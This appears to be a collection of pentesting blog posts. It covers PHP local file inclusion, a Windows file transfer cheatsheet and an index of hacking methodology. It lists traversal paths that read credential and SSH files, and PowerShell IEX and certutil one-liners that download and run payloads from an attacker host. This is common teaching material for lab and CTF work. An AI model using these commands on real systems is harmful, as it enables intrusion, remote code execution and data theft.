Tips & Tricks

Exploiting PHP Based LFI


Different PHP Methods

There are two different methods that will create an LFI if not used correctly. Those two are:

file_get_contents() – This is going to just display the text within the file by reading the contents as a string, and will not interpret PHP code for execution. If the LFI is using this method, you can only enumerate files on the filesystem.

include() – This is going to execute everything within the PHP tag as actual PHP code. If the LFI is using this method, then we SHOULD be able to get command execution.

You can tell which method is being used by using the LFI to read the PHP file that causes the LFI.

  • If the source code IS displayed, then the PHP code was interpreted by the server and you have a file_get_content() LFI.
  • If the code is NOT displayed, then you have an include().

Example: Say your request looks like this:

GET /news.php?file=../news.php

Because the source code is visible in the response, we can assume we’re working with a file_get_content() LFI with no possibility of code execution.


Files to check while enumerating LFI:

../../../../../../../etc/passwd
../../../../../../../home/<users>/.ssh/authorized_keys
../../../../../../../home/<users>/.ssh/bash_history

To get the username of who we’re running as:
../../../../../../../proc/self/environ

To see what binary is running this service:
../../../../../../../proc/self/cmdline

If you have Tomcat running as well, you may want to enumerate these:

../../../../../../../usr/share/tomcat9/bin/catalina.sh
../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
../../../../../../../usr/share/tomcat9/conf/tomcat-users.xml

Note: Make sure to adjust the version number located in the path.

Tips & Tricks

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.


Uploading and Hosting Files

Python Web Server

The following will start a webserver in the present working directory using Python2.
python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.
python3 -m http.server 80


Impacket SMB Server

You can download Impacket from Github.

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.
mkdir smb
impacket-smbserver <sharename> `<path>`

Then we can mount this file share in PowerShell from the other side.
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.
cd <ShareName>:

Additional Method With Authentication:

On our Kali machine, we’ll start our Impacket server while in the directory we wish to host.
sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password>

Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands:

$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>', $pass)
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName> -Credential $cred


Downloading Files

PowerShell

The following will download and store a remote file to disk.
Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')

An alternative to the above is to use Invoke-WebRequest in a different manner.
powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)"


CertUtil

The following will download and store a remote file to disk.
certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe


Windows Defender

The following will download and store a remote file to disk.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]


Transferring with SSH

To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination

To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination


Transferring via Base64 Encoding

From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files.

Within PowerShell, you can encode a file by running:

$file-contents = Get-Content "filename.txt"
$file-encode = [System.Text.Encoding]::UTF8.GetBytes($file-contents)
[System.Convert]::ToBase64String($file-encode)

Then, within Kali, you can decode it using the following:
echo -n <base64String> | base64 -d > filename.txt

This should create the file for you to interact with.


Pentesting, Tips & Tricks

Hacking Methodology Cheatsheet

This post is going to contain a list of common tools, vulnerabilities, & methodology tactics broken down by category and contains links to references that will showcase examples. This document will be updated often as I work through more and more resources.


Enumerating Common Services

Enumerating SMB 139,445

  • Using smbmap and smbclient to crawl and browse shares. Example of this in HTB FriendZone – Link to Ippsec video.

Enumerating LDAP 389


External Tools/Methodology

Using Hydra to Brute-Force Websites

Using ASP/ASPX Webshells

Enumerating Tomcat

Enumerating HTTP Proxies

Connecting to/Abusing IRC

Performing Zone Transfers


Local/Remote File Inclusion (LFI & RFI)

  • Using PHP Wrappers within LFI to Obtain PHP Script Source Code — My post
  • XML Entity Injection (XXE) Vuln for LFI. HackTheBox: DevOops. – Link to Ippsec Video

Privilege Escalation Techniques/Tools

Privilege Escalation: Using Sherlock

Privilege Escalation: Using Windows-Exploit-Suggester


Pivoting & Utilizing Proxies

Routing Tools Through Proxies


Common Vulnerabilities

Exploiting MS17-010 (EternalBlue)

  • HackTheBox: Blue

Exploiting MS14-066 (Heartbleed)

Exploiting CVE-2016-5195 (DirtyCow)


Common Active Directory Attacks

Abusing LLMNR/NBT-NS w/ Responder

Abusing IPv6

Utilizing CrackMapExec